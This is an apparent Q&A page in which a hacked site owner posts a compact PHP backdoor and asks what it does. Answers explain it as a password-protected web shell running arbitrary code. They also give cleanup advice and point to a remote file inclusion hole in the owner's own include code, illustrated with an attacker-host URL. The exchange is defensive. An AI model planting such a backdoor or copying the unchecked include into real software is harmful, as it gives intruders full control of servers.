I was hacked, and apparently they were sending spam emails. There were two files that they injected into my server (that were duplicated across all sub-directories). One is a heavily hashed PHP file that may be the sender. The code below is from the other file.
Here's my question -- What is this accomplishing? I can't translate its purpose. Also, what should I do to avoid allowing this to happen again?
<?php
if(@md5($_POST['pass'])!=='692e3f52ee6f16bc78fa6e1ec4bd4a6a')
die();
@extract($_POST);
if(!empty($a))
@$a($b);
if(!empty($_FILES['tmp_name']))
@include($_FILES['tmp_name']);
?>
Yes, it's entirely possible for someone to hack a server, via an exploit, or by stealing your password, or via buggy code you or others have written, or a number of different ways. Save this answer. Show activity on this post.
Yes, you can recover a hacked website by purging the malware and restoring a backup file. However, the process is rather technical. We recommend hiring a cyber security expert if you're not confident in your technical skills to prevent further damage to the website.
When your website gets hacked, hackers often have injected malicious code or files into your website. This adds additional data to your website servers and overwhelms them, which can lead to your website loading slower than before.
rename the file immediately (to something other than .php) before further inspecting it, so any malicious user can't use it anymore.
Then investigate to how they were able to inject this on your server.
In your access logs you will find page-loads that load that specific PHP file. That will be your first clue. Investigate other connections from the same IP address for example and look at what scripts they have accessed/abused. Somewhere you will probably find you have an outdated/vulnerable wordpress plug-in, joomla plug-in, etc. Update or remove that plug-in ASAP, or you will be hacked again soon!
Also when checking your access logs, see if they have uploaded new backdoors! Maybe you see some scripts being called by the same IP address that should not exist. Delete/Rename them too!
What is code does is pretty simple, yet pretty advanced: It allows the holder of the password to execute any code you would be able to execute through PHP. The advanced bit is that it is difficult to detect. It uses no base64, no eval, etc.
edit:
idealizm said in the comments:
I'm actually not using Wordpress (or any other CMS) on this domain -- but I do have an index.php file which handles the dynamic creation of various pages by doing an include of an existing file prefixed with an underscore -- so index.php?go=about would include("about.php"). It checks if the file exists, and, if not, only includes the default file. I was hoping that this was secure enough. Is this where they might have exploited my code? ` if ($_GET['go']=='') { $go = 'videos'; } else { $go = $_GET['go']; } if (!(file_exists(''.$go.'.php'))) { $go = 'videos'; }
Yes, there can be your problem! You say the included file is prefixed with an underscore, but I don't see that in your code... So, if the hacker went to index.php?go=http://hackerssite.com/hackerscode
, you would end up including http://hackerssite.com/hackerscode.php
code, and allow for havoc!
Remove (and never allow) the code inclusion of direct user input. Check $_GET['go']
against an array of allowed include pages, or use a switch
to call the include
.
If you love us? You can donate to us via Paypal or buy me a coffee so we can maintain and grow! Thank you!
Donate Us With